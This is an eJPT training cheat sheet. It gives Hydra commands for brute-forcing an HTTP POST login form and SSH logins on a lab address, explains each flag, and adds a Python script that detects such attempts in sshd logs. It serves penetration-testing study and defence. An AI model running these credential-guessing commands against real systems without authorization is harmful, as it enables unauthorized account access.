eJPT Junior Penetration Tester
Hydra

HTTP POST Form
hydra 10.10.10.10 http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V
hydra -v -V -u -L users.txt -P passwords.txt -t 1 10.10.10.10 ssh
hydra -v -V -u -l root -P passwords.txt -t 1 10.10.10.10 ssh

HTTP POST Form Attack Using Hydra

To launch a brute force attack against an HTTP POST form, you can use the following command with Hydra:

hydra 10.10.10.10 http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V

In this command:

  • Replace 10.10.10.10 with the target host (IP address or hostname, without the http:// scheme; Hydra takes the host and the service name as separate arguments).

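  • Adjust the /login.php:user=^USER^&password=^PASS^:Incorrect credentials string to match the form data and failure message. It has three colon-separated parts: the login path, the POST body (with ^USER^ and ^PASS^ as placeholders for each attempt), and the text that appears in a failed-login response.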

  • The -L flag specifies a file with usernames, and -P specifies a file with passwords.

  • The -f flag tells Hydra to stop after the first correct password is found.

  • The -V flag increases the verbosity, showing the attempts in the output.

SSH Brute Forcing with Hydra

To perform a brute force attack on SSH, you can use Hydra with variations of the following commands:

For a list of users:

hydra -v -V -u -L users.txt -P passwords.txt -t 1 10.10.10.10 ssh

For a single user:

hydra -v -V -u -l root -P passwords.txt -t 1 10.10.10.10 ssh

Notes:

  • The -v and -V flags are for verbose mode, showing the login attempts.

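  • The -u flag makes Hydra loop around the usernames rather than the passwords, so each password is tried against every user before moving on to the next password.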

  • The -L and -l flags are for specifying the username list and a single username, respectively.

  • The -P flag is for the password list.

  • The -t flag controls the number of concurrent connections (threads).
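From the defender's side, the SSH runs above leave a recognizable trail in the sshd auth log. The following added example (not part of the original notes) parses constructed OpenSSH log lines and flags sources with repeated failed password logins, separating the user-list pattern (-L) from the single-user one (-l); the function name, threshold and sample lines are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample sshd auth log lines (not taken from a real host).
SAMPLE_LOG = """\
Jan 10 10:00:01 web01 sshd[2201]: Failed password for root from 10.10.10.5 port 40112 ssh2
Jan 10 10:00:02 web01 sshd[2202]: Failed password for invalid user admin from 10.10.10.5 port 40114 ssh2
Jan 10 10:00:03 web01 sshd[2203]: Failed password for invalid user test from 10.10.10.5 port 40116 ssh2
Jan 10 10:00:04 web01 sshd[2204]: Failed password for root from 10.10.10.5 port 40118 ssh2
Jan 10 10:00:06 web01 sshd[2206]: Accepted password for root from 10.10.10.5 port 40122 ssh2
Jan 10 10:05:00 web01 sshd[2301]: Failed password for alice from 192.168.1.20 port 51000 ssh2
Jan 10 10:05:09 web01 sshd[2302]: Accepted password for alice from 192.168.1.20 port 51002 ssh2
Jan 10 10:07:01 web01 sshd[2401]: Failed password for root from 10.10.10.7 port 33010 ssh2
Jan 10 10:07:02 web01 sshd[2402]: Failed password for root from 10.10.10.7 port 33012 ssh2
Jan 10 10:07:03 web01 sshd[2403]: Failed password for root from 10.10.10.7 port 33014 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def find_bruteforce(log_text, min_failures=3):
    """Report sources with at least min_failures failed SSH password logins."""
    failed = defaultdict(list)     # source IP -> usernames that failed, in order
    succeeded = defaultdict(set)   # source IP -> users logged in after failures
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failed[ip].append(user)
        elif failed[ip]:  # a success that follows failures from the same source
            succeeded[ip].add(user)
    findings = {}
    for ip, users in failed.items():
        if len(users) >= min_failures:
            findings[ip] = {
                "failures": len(users),
                "users": sorted(set(users)),
                "mode": "user-list" if len(set(users)) > 1 else "single-user",
                "success_after_failures": sorted(succeeded[ip]),
            }
    return findings

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

A non-empty success_after_failures list is the finding to triage first, since it means a guessed password worked for that account.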

Please ensure you have the correct permission and authorization before attempting any form of penetration testing. Unauthorized access is illegal and unethical.
